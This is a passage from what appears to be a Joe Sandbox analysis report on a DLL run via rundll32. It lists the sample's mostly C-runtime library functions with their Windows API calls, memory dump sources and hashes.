                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6EB0B46E,00000001,00000364,00000006,000000FF,?,00000001,6EB0B68B,6EB0B935,?,?,6EB0AB0E), ref: 6EB0B8F3
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: 277392e33f7e49666117ddc13b38aa083189dca2d5446cd930fd1fea4074c845
                      • Instruction ID: 441194d3ad83f1f5c06f8ba5c368201d4ec87fb118b549307dd66b8d21047020
                      • Opcode Fuzzy Hash: 277392e33f7e49666117ddc13b38aa083189dca2d5446cd930fd1fea4074c845
                      • Instruction Fuzzy Hash: 1EF0BB3111576657EB528ED78C95A8F3F58EF42670B114161D814970ACDB30F40082A0

                      Non-executed Functions

                      Function 6EB07288 Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6EB07294
                      • IsDebuggerPresent.KERNEL32 ref: 6EB07360
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6EB07380
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 6EB0738A
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: abcbddf40fd6a522ef06c48b4d7b590712fcbc4b3788a9c4cb8d4c3bcad8f256
                      • Instruction ID: 1c656878e5f2da9a067285736913b8d0da80496f056099db5c0423f30d34d905
                      • Opcode Fuzzy Hash: abcbddf40fd6a522ef06c48b4d7b590712fcbc4b3788a9c4cb8d4c3bcad8f256
                      • Instruction Fuzzy Hash: E8311AB5D15229DBDB10DFA4C9897CDBBB8AF08304F1041DAE409A7280EBB45A85CF44
                      Function 6EB09820 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6EB09918
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6EB09922
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6EB0992F
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: bd728c4801c2d791da964c47c8862359abdfe4ab73a60545249a1f0a1d745c78
                      • Instruction ID: c5709475d94b99dceaf0a4850a04ec646fe16334bf8784b34af9fbc924cf4fb0
                      • Opcode Fuzzy Hash: bd728c4801c2d791da964c47c8862359abdfe4ab73a60545249a1f0a1d745c78
                      • Instruction Fuzzy Hash: 2A31E8749112299BCF61DF64C989BCCBBB8FF48310F5041DAE41CA7290E774AB858F44
                      Function 6EB0A254 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetCurrentProcess.KERNEL32(?,?,6EB0A253,?,00000001,?,?), ref: 6EB0A276
                      • TerminateProcess.KERNEL32(00000000,?,6EB0A253,?,00000001,?,?), ref: 6EB0A27D
                      • ExitProcess.KERNEL32 ref: 6EB0A28F
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: Process$CurrentExitTerminate
                      • String ID:
                      • API String ID: 1703294689-0
                      • Opcode ID: 3c9e60628fa19677db4d90d0b41d1ec4c5283912388006b7507eeb84de19628a
                      • Instruction ID: ceb6f97b28c846d5673eced0566fe34fb5511e8bdd1d87686f31bd21e82c5316
                      • Opcode Fuzzy Hash: 3c9e60628fa19677db4d90d0b41d1ec4c5283912388006b7507eeb84de19628a
                      • Instruction Fuzzy Hash: 73E0E631421545EFCF516F94C85DA8C7F69FB55651B014824F4058B535CB36E981DF90
                      Function 6EB11AB1 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6EB11AAC,?,?,00000008,?,?,6EB11744,00000000), ref: 6EB11CDE
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: f20dcca05249fa8a041eb184641bf255b308874648c9cc6a840bdc3aacd1def3
                      • Instruction ID: b917520fee106e778f8f72189705429581090fa0e9e99cf9d11be3ecf69d6835
                      • Opcode Fuzzy Hash: f20dcca05249fa8a041eb184641bf255b308874648c9cc6a840bdc3aacd1def3
                      • Instruction Fuzzy Hash: 44B15531224649CFD745CF68C496BA57FA0FF15364F298698E8E9CF2A1C335E986CB40
                      Function 6EB070A7 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                      Download Yara Rule
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6EB070BD
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: FeaturePresentProcessor
                      • String ID:
                      • API String ID: 2325560087-0
                      • Opcode ID: 2755254e9dc94bccce2c433ddbb50ea44eb18e63434be3b2c7e9d90f6be2c65b
                      • Instruction ID: fd12ae1faaaa1730b947db1d7e110333f03e66303b8399ffe031909fcaa4079b
                      • Opcode Fuzzy Hash: 2755254e9dc94bccce2c433ddbb50ea44eb18e63434be3b2c7e9d90f6be2c65b
                      • Instruction Fuzzy Hash: 855149B1A10B568BDB04DF95C49679ABFF0EB45360F20C46AD515EB680D3B4A940CF60
                      Function 6EB0BCEE Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 660cfadff491239c4e3264276f3a099958887481dbc097168be0c2d84056ed39
                      • Instruction ID: 7f4260ebe5ecdd0bbf43cbb908b86d04cde30e9909ad435a2b738c810bad5b93
                      • Opcode Fuzzy Hash: 660cfadff491239c4e3264276f3a099958887481dbc097168be0c2d84056ed39
                      • Instruction Fuzzy Hash: 5D41ADB1814259AEDB50CFA9CCD8AEEBFB8EF45304F1446D9E41DE3214DA34AE848F50
                      Function 6EB0D218 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: HeapProcess
                      • String ID:
                      • API String ID: 54951025-0
                      • Opcode ID: 8717babdb95e310683b30a008783ffee452774299d9cf5445523185dc5fe7ce5
                      • Instruction ID: 60940b5c9bb960b910cf86e94d9dc8a22c9d4ae7e6cd404ca03303839927007a
                      • Opcode Fuzzy Hash: 8717babdb95e310683b30a008783ffee452774299d9cf5445523185dc5fe7ce5
                      • Instruction Fuzzy Hash: EEA00274A11A01CF9F408F75862B38E3AE9BEBF6F27259179E409C7955EB348460EB01
                      Function 6EB0B881 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 08556a0b7e2f291a7373366f56b938cabd7d16554c8359c94350950b64b82922
                      • Instruction ID: 0b1b1411b2738ecb05b891e4ae5b0c5dcb5d8244eff7faaf3a26b629e0c714bb
                      • Opcode Fuzzy Hash: 08556a0b7e2f291a7373366f56b938cabd7d16554c8359c94350950b64b82922
                      • Instruction Fuzzy Hash: 5BE08C32A21268EBCB15CBD8C980A8EBBECEB44B10B1145A6F511D3214C270EE04CBD0
                      Function 6EB0DDF0 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • ___free_lconv_mon.LIBCMT ref: 6EB0DE34
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E24D
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E25F
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E271
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E283
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E295
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E2A7
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E2B9
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E2CB
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E2DD
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E2EF
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E301
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E313
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E325
                      • _free.LIBCMT ref: 6EB0DE29
                        • Part of subcall function 6EB0B90F: HeapFree.KERNEL32(00000000,00000000,?,6EB0AB0E), ref: 6EB0B925
                        • Part of subcall function 6EB0B90F: GetLastError.KERNEL32(?,?,6EB0AB0E), ref: 6EB0B937
                      • _free.LIBCMT ref: 6EB0DE4B
                      • _free.LIBCMT ref: 6EB0DE60
                      • _free.LIBCMT ref: 6EB0DE6B
                      • _free.LIBCMT ref: 6EB0DE8D
                      • _free.LIBCMT ref: 6EB0DEA0
                      • _free.LIBCMT ref: 6EB0DEAE
                      • _free.LIBCMT ref: 6EB0DEB9
                      • _free.LIBCMT ref: 6EB0DEF1
                      • _free.LIBCMT ref: 6EB0DEF8
                      • _free.LIBCMT ref: 6EB0DF15
                      • _free.LIBCMT ref: 6EB0DF2D
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                      • String ID:
                      • API String ID: 161543041-0
                      • Opcode ID: 289a0bdf664b5a91976db207c72ae6a085b0b7f6a1cee6051f52e34d07348cbd
                      • Instruction ID: 9fec6bfeae3b964eb27e72d84acb22a48eddee465f93d54acd55928aa0dba300
                      • Opcode Fuzzy Hash: 289a0bdf664b5a91976db207c72ae6a085b0b7f6a1cee6051f52e34d07348cbd
                      • Instruction Fuzzy Hash: FD314A716242859FEF619AB4EC84B9A7FE8EF01354F109829E495D7198DB30F9508A20
                      Function 6EB082C0 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • IsInExceptionSpec.LIBVCRUNTIME ref: 6EB083BD
                      • type_info::operator==.LIBVCRUNTIME ref: 6EB083DF
                      • ___TypeMatch.LIBVCRUNTIME ref: 6EB084EE
                      • IsInExceptionSpec.LIBVCRUNTIME ref: 6EB085C0
                      • _UnwindNestedFrames.LIBCMT ref: 6EB08644
                      • CallUnexpected.LIBVCRUNTIME ref: 6EB0865F
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                      • String ID: csm$csm$csm
                      • API String ID: 2123188842-393685449
                      • Opcode ID: 7319352720694bcb0ac622968f33e8aa391fda261d87fb3d215609b31ab21b08
                      • Instruction ID: 812e0fd2ee607008f695da1b37a606d0f2639c5811e37dc461ffb78ee53896ec
                      • Opcode Fuzzy Hash: 7319352720694bcb0ac622968f33e8aa391fda261d87fb3d215609b31ab21b08
                      • Instruction Fuzzy Hash: 22B1747181029AEFCF05DFE4D88099EBFB9FF44324B10856AE8146B211D771EA62CF91
                      Function 6EB0B188 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: c036b6b94e4bd38e3cdecacbafebaff441c65364be520d290f13e8addb581f80
                      • Instruction ID: b6bd2119dcfd85b9f8807f17e8d65334591bfcda4fdf6fc00a6a49b1b76aa829
                      • Opcode Fuzzy Hash: c036b6b94e4bd38e3cdecacbafebaff441c65364be520d290f13e8addb581f80
                      • Instruction Fuzzy Hash: 4821947692414CAFCF51EFE4C880EDE7FB9AF08344F0149A6E5659B125EB31EB448B80
                      Function 6EB07C10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                      Download Yara Rule
                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 6EB07C47
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 6EB07C4F
                      • _ValidateLocalCookies.LIBCMT ref: 6EB07CD8
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 6EB07D03
                      • _ValidateLocalCookies.LIBCMT ref: 6EB07D58
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 1170836740-1018135373
                      • Opcode ID: c0dd08dc3f18af68791d607c18deb68b142552a0ca7544daf9622de31752b802
                      • Instruction ID: e8851a1b1e567d377dfbe8c592cc6451f95b031d43994da386326309ced19145
                      • Opcode Fuzzy Hash: c0dd08dc3f18af68791d607c18deb68b142552a0ca7544daf9622de31752b802
                      • Instruction Fuzzy Hash: 4341E434A10199ABCF10EFA8C854ADEFFB5FF45328F108595E8145B395D7B1BA11CB90
                      Function 6EB0CE36 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID:
                      • String ID: api-ms-$ext-ms-
                      • API String ID: 0-537541572
                      • Opcode ID: ffb0bac61f9daa99771753beb69bb4c20e2dfabfcff6c4c05658b4c02e2a0acd
                      • Instruction ID: fdcf33e4a48db0c30669cdf978e46ab5d79900be1d69497864c8a17691f12af9
                      • Opcode Fuzzy Hash: ffb0bac61f9daa99771753beb69bb4c20e2dfabfcff6c4c05658b4c02e2a0acd
                      • Instruction Fuzzy Hash: 6121F332B55661EBCB118AE9AC85B8B3F69EB027B0F110514E916EF685D730F800CAF0
                      Function 6EB0E3CF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                        • Part of subcall function 6EB0E397: _free.LIBCMT ref: 6EB0E3BC
                      • _free.LIBCMT ref: 6EB0E41D
                        • Part of subcall function 6EB0B90F: HeapFree.KERNEL32(00000000,00000000,?,6EB0AB0E), ref: 6EB0B925
                        • Part of subcall function 6EB0B90F: GetLastError.KERNEL32(?,?,6EB0AB0E), ref: 6EB0B937
                      • _free.LIBCMT ref: 6EB0E428
                      • _free.LIBCMT ref: 6EB0E433
                      • _free.LIBCMT ref: 6EB0E487
                      • _free.LIBCMT ref: 6EB0E492
                      • _free.LIBCMT ref: 6EB0E49D
                      • _free.LIBCMT ref: 6EB0E4A8
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
                      • Instruction ID: ab3b070aa7b59f22fa54655f1d59ad397c529eb81970f738f64a02615da9dec9
                      • Opcode Fuzzy Hash: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
                      • Instruction Fuzzy Hash: 3A112B71974B88AEDE32ABF0CD45FCF7F9CAF04708F404C1AA299A6094DB75FA148650
                      Function 6EB0F25C Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6EB0F2A4
                      • __fassign.LIBCMT ref: 6EB0F489
                      • __fassign.LIBCMT ref: 6EB0F4A6
                      • WriteFile.KERNEL32(?,6EB0D927,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EB0F4EE
                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6EB0F52E
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EB0F5D6
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                      • String ID:
                      • API String ID: 1735259414-0
                      • Opcode ID: 515eb233285ee3d760550337654c974ed4d0c3ec8f00382ed3c3b208417cb24a
                      • Instruction ID: 30de65cb30eb0c5ecb9e399116e7665f440a4c1cc0b1ccb5bd106372f2cc132f
                      • Opcode Fuzzy Hash: 515eb233285ee3d760550337654c974ed4d0c3ec8f00382ed3c3b208417cb24a
                      • Instruction Fuzzy Hash: 4CC18B75E002999FCB15CFE8C8909EDBFB9FF49324F28416AE855B7241D631A902CF64
                      Function 6EB07F89 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(00000001,?,6EB07B9E,6EB068B4,6EB06D4B,?,6EB06F85,?,00000001,?,?,00000001,?,6EB1C7F8,0000000C,6EB0707E), ref: 6EB07F97
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6EB07FA5
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6EB07FBE
                      • SetLastError.KERNEL32(00000000,6EB06F85,?,00000001,?,?,00000001,?,6EB1C7F8,0000000C,6EB0707E,?,00000001,?), ref: 6EB08010
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: f707b4d0485f6a2d1580ebfd60f948c130fc54423b10197d553defc463fa6b61
                      • Instruction ID: a52f47ce22b4576bdf943a83dcb86df6536ef896e3aaf36ae5b113272caa29b1
                      • Opcode Fuzzy Hash: f707b4d0485f6a2d1580ebfd60f948c130fc54423b10197d553defc463fa6b61
                      • Instruction Fuzzy Hash: 5501D83332D6A3AD9A6156F45C9E69F3E58DB527797200B3DF120864D4EF51A8016540
                      Function 6EB0C17B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                      Download Yara Rule
                      Strings
                      • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6EB0C180
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
